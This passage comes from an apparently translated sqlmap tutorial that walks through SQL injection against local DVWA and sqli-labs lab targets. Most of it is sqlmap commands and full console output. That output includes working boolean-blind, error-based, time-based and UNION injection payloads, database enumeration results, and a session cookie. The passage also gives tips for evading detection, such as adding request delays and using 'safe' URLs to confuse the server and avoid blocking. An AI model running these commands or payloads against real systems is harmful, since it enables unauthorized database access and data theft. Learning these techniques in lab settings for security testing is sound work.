[18:06:29] [INFO] retrieved: 'sys'
available databases [12]:
[*] challenges
[*] demo
[*] demo1125
[*] demo1204
[*] dvwa
[*] information_schema
[*] jingdong
[*] mysql
[*] performance_schema
[*] pythontest
[*] security
[*] sys
[18:06:29] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 18:06:29 /2020-02-26/
Get the current database for testing:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKX FpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug" --banner --current-db
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:08:43 /2020-02-26/
Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N]
[18:08:45] [INFO] resuming back-end DBMS 'mysql'
[18:08:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=1' OR NOT 4485=4485#&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4021 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(4021=4021,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- itaf&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5269 FROM (SELECT(SLEEP(5)))UGkv)-- hSLn&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x7170767871,0x77445a5271767a68534a6a4f506b6d7846796151674d745a704549484b614856506754536d726242,0x716a7a6a71),NULL#&Submit=Submit
---
[18:08:45] [INFO] the back-end DBMS is MySQL
[18:08:45] [INFO] fetching banner
[18:08:45] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries)
[18:08:45] [INFO] resumed: '5.7.26'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:08:45] [INFO] fetching current database
[18:08:45] [INFO] retrieved: 'dvwa'
current database: 'dvwa'
[18:08:45] [INFO] fetched data logged to text files under 'xxxx\output\127.0.0.1'
[*] ending @ 18:08:45 /2020-02-26/
It can be seen that the current database is dvwa.
Scenario 2:
Want to exploit SQL injection vulnerability on cookie value. Want to detect whether cookie injection exists. sqlmap uses cookie procedure:
- Login or browse page
- cookie found
- Use - Cookie value in sqlmap
The demonstration of logging in and obtaining cookie s is as follows:
The cookie value displayed on the web page is different from that in the developer tool. The cookie displayed in the developer tool is the cookie of response. The cookie displayed in the developer tool is the cookie of request. The displayed cookie is used in the test. Test:
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-20/index.php" --cookie "uname=admin" -- level 2 --banner
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:41:24 /2020-02-26/
[18:41:24] [INFO] testing connection to the target URL
[18:41:24] [INFO] testing if the target URL content is stable
[18:41:24] [INFO] target URL content is stable
[18:41:24] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised t
o rerun with '--forms'
[*] ending @ 18:41:24 /2020-02-26/
explain: The cookie injection information will be displayed only when the specified level is greater than or equal to 2; When there are set cookie parameters in the response header, sqlmap will automatically load the values of set cookie for detection. If you want to use these values, you need to add the parameter - drop set cookie.
3, sqlmap setting request parameters (Part 2)
1. Set user agent in sqlmap
By default, sqlmap uses the following user agents to execute HTTP requests:
sqlmap/1.0-dev-xxxx(http://sqlmap.org)
sqlmap specifies user agent and uses parameters
– user agent = 'specified user agent'
Specify request header:
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-20/index.php" --cookie "uname=admin" -- level 6 --banner --user-agent="Mozilla/5.0 (Windows NT 10. 0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36"
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:50:43 /2020-02-26/
[18:50:43] [INFO] testing connection to the target URL
[18:50:43] [INFO] testing if the target URL content is stable
[18:50:44] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic no
r injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[18:50:45] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised t
o rerun with '--forms'
[*] ending @ 18:50:45 /2020-02-26/
Use random request header:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-20/index.php --cookie "uname=admin" --level 2 --banner --random-agent -v 5 --banner
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:58:38 /2020-02-26/
[18:58:38] [DEBUG] cleaning up configuration parameters
[18:58:38] [DEBUG] setting the HTTP timeout
[18:58:38] [DEBUG] setting the HTTP Cookie header
[18:58:38] [DEBUG] setting the HTTP User-Agent header
[18:58:38] [DEBUG] loading random HTTP User-Agent header(s) from file 'E:\SQLMAP\sqlmapproject-sqlmap-0605f14\data\txt\user-agents.txt'
[18:58:38] [INFO] fetched random HTTP User-Agent header value 'Opera/9.50 (Macintosh; Intel Mac OS X; U; en)' from file 'E:\SQLMAP\sqlmapproject-sqlmap-06
05f14\data\txt\user-agents.txt'
[18:58:38] [DEBUG] creating HTTP requests opener object
[18:58:38] [INFO] resuming back-end DBMS 'mysql'
[18:58:38] [INFO] testing connection to the target URL
[18:58:38] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-20/index.php HTTP/1.1
Cache-control: no-cache
Cookie: uname=admin
User-agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; en)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close
[18:58:38] [DEBUG] declared web page charset 'utf-8'
[18:58:38] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Wed, 26 Feb 2020 10:58:38 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-20/index.php
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: uname=admin' AND 1273=1273 AND 'VZnJ'='VZnJ
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=admin' AND (SELECT 9557 FROM(SELECT COUNT(*),CONCAT(0x71627a7071,(SELECT (ELT(9557=9557,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFOR
MATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Wwka'='Wwka
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=admin' AND (SELECT 7148 FROM (SELECT(SLEEP(5)))nwhA) AND 'Invp'='Invp
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: uname=-2942' UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7071,0x43464c794b4a465a5649744b6d764e59424342614873544d7759636a62516371494476496653436
2,0x71717a7171)-- -
Vector: UNION ALL SELECT NULL,NULL,[QUERY]-- -
---
[18:58:38] [INFO] the back-end DBMS is MySQL
[18:58:38] [INFO] fetching banner
[18:58:38] [DEBUG] resuming configuration option 'string' ('Login')
[18:58:38] [DEBUG] performed 0 queries in 0.00 seconds
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:58:38] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 18:58:38 /2020-02-26/ Test again:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-18/index.php --random-agent -v 5 --banner --level 3
Display:
The content of detection has increased significantly.
2. Set agent in sqlmap
Set agent parameters in sqlmap:
- –proxy Set HTTP proxy server location format: * * – proxy http(s): //ip [port]**
- –proxy-cred Set HTTP proxy server authentication information format: * * – proxy cred user: PWD**
- –proxy-file Set multiple proxies in file
- –ignore-proxy When you want to target the local network by ignoring the HTTP(S) proxy server settings within the system
The first parameter is most commonly used. **– proxy * * parameter test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --proxy "http://123.30.238.60:3128" --banner
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:23:06 /2020-02-26/
[19:23:07] [INFO] resuming back-end DBMS 'mysql'
[19:23:07] [INFO] testing connection to the target URL
[19:23:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)
[19:23:28] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--ignore-proxy', '--proxy',...)
[19:24:31] [CRITICAL] unable to connect to the target URL or proxy
[*] ending @ 19:24:31 /2020-02-26/
Obviously, the proxy IP connection was not successful.
3. Set delay in sqlmap
Parameters: **--delay 0** During sqlmap detection, a large number of detection payloads will be sent to the target. If the default is too fast, the target will be warned. To avoid this, you can set the sqlmap packet delay in the probe. By default, no delay is set.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --delay 10 --banner
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:32:51 /2020-02-26/
[19:32:52] [INFO] resuming back-end DBMS 'mysql'
[19:32:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2' AND 7360=7360 AND 'lcZO'='lcZO
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=2' AND (SELECT 4240 FROM(SELECT COUNT(*),CONCAT(0x716a787171,(SELECT (ELT(4240=4240,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DARZ'='DARZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2' AND (SELECT 9537 FROM (SELECT(SLEEP(5)))eRXY) AND 'MqRr'='MqRr
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-1033' UNION ALL SELECT NULL,NULL,CONCAT(0x716a787171,0x454766684a4352517a444b547a68524a6f744f4e6f7770796e6446515668715a516c424948495449,0x7176627071)-- -
---
[19:33:02] [INFO] the back-end DBMS is MySQL
[19:33:02] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[19:33:02] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 19:33:02 /2020-02-26/
Obviously, from 19:32:52 to 19:33:02 is exactly 10 seconds, that is, the set delay time.
4. Set timeout in sqlmap
Parameters: **--timeout 30**
Before considering the timeout HTTP request, you can specify the number of seconds to wait. The valid value is a floating point number, such as 10.5 seconds. The default is 30 seconds.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --timeout 3.5 --banner
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:38:20 /2020-02-26/
[19:38:20] [INFO] testing connection to the target URL
[19:38:20] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:38:20] [INFO] testing if the target URL content is stable
[19:38:21] [INFO] target URL content is stable
[19:38:21] [INFO] testing if GET parameter 'id' is dynamic
[19:38:21] [INFO] GET parameter 'id' appears to be dynamic
[19:38:21] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:38:21] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[19:38:21] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[19:38:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:38:27] [WARNING] reflective value(s) found and filtering out
[19:38:27] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[19:38:27] [INFO] testing 'Generic inline queries'
[19:38:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:38:27] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:38:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:38:27] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:38:27] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:38:27] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:38:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:38:27] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:38:27] [INFO] testing 'MySQL inline queries'
[19:38:27] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:38:27] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[19:38:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:38:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:38:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:38:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:38:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:38:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:38:32] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[19:38:39] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)' injectable
[19:38:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:38:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:38:39] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:38:39] [INFO] target URL appears to have 3 columns in query
[19:38:40] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3414=3414 AND 'ixAz'='ixAz
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3869 FROM(SELECT COUNT(*),CONCAT(0x7171717171,(SELECT (ELT(3869=3869,1))),0x717a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'yUCf'='yUCf
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: id=1' OR (SELECT 9421 FROM (SELECT(SLEEP(5)))QJil) AND 'yspB'='yspB
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9639' UNION ALL SELECT NULL,NULL,CONCAT(0x7171717171,0x4b5469547561534947737449585a676d4767636475516b6c7a79726c687a54535149694e4f6e7962,0x717a717871)-- -
---
[19:38:43] [INFO] the back-end DBMS is MySQL
[19:38:43] [INFO] fetching banner
[19:38:43] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[19:38:43] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 19:38:43 /2020-02-26/
5. Set timeout retry times in sqlmap
Parameters: **--retries 3**
Set the corresponding retry times. By default, retry 3 times.
Test after closing apache and mysql services:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --timeout 3.5 --retries 5 --banner
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:56:59 /2020-02-26/
[19:57:00] [INFO] testing connection to the target URL
[19:57:02] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:57:02] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--ignore-proxy', '--proxy',...)
[19:57:12] [CRITICAL] unable to connect to the target URL
[19:57:12] [INFO] testing if the target URL content is stable
[19:57:14] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:57:24] [CRITICAL] unable to connect to the target URL
[19:57:24] [ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) by using higher verbosity levels
[19:57:24] [INFO] testing if GET parameter 'id' is dynamic
[19:57:26] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue? [y/N]
[19:58:07] [ERROR] user quit
[*] ending @ 19:58:07 /2020-02-26/
Obviously, five attempts were made
6. Set random parameters in sqlmap
Parameters: **--randomize parameter name**
sqlmap can specify the parameter name whose value will be changed randomly during each request. The length and type should be consistent with the original value provided.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --randomize id --banner -v 5
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:08:08 /2020-02-26/
[20:08:08] [DEBUG] cleaning up configuration parameters
[20:08:08] [DEBUG] setting the HTTP timeout
[20:08:08] [DEBUG] setting the HTTP User-Agent header
[20:08:08] [DEBUG] creating HTTP requests opener object
[20:08:09] [INFO] resuming back-end DBMS 'mysql'
[20:08:09] [INFO] testing connection to the target URL
[20:08:09] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=7 HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close
[20:08:09] [DEBUG] declared web page charset 'utf-8'
[20:08:09] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Wed, 26 Feb 2020 12:08:09 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=7
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6613=6613 AND 'wyLD'='wyLD
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4185 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(4185=4185,1))),0x71706a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aqQg'='aqQg
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4770 FROM (SELECT(SLEEP(5)))RbSZ) AND 'xahz'='xahz
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9218' UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x4e6a506169494f6c654a42614659426f70457a4f77454d4f494c415144525967626d41745067674a,0x71706a7871)-- -
Vector: UNION ALL SELECT NULL,NULL,[QUERY]-- -
---
[20:08:09] [INFO] the back-end DBMS is MySQL
[20:08:09] [INFO] fetching banner
[20:08:09] [DEBUG] resuming configuration option 'string' ('Your')
[20:08:09] [DEBUG] performed 0 queries in 0.00 seconds
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[20:08:09] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 20:08:09 /2020-02-26/
Obviously, at this time, the id is 7, which is generated randomly.
7. Set ignore 401 in sqlmap
If the test site occasionally returns HTTP error 401 and you want to ignore it and continue the test without providing appropriate credentials, you can use -- ignore-401 to ignore the unverified error.
8. Avoid being shielded due to too many wrong requests
Sometimes when the server detects that there are too many wrong requests from a client, it will shield it, and the test of Sqlmap will often produce a large number of wrong requests. In order to avoid being shielded, it can generate several normal requests from time to time to confuse the server. Parameters:
- –safe-url Visit your secure URL every other minute
- –safe-post POST data carried when accessing a secure URL
- –safe-req Load secure HTTP request from file
- –safe-freq After each test request, you will access the following secure URL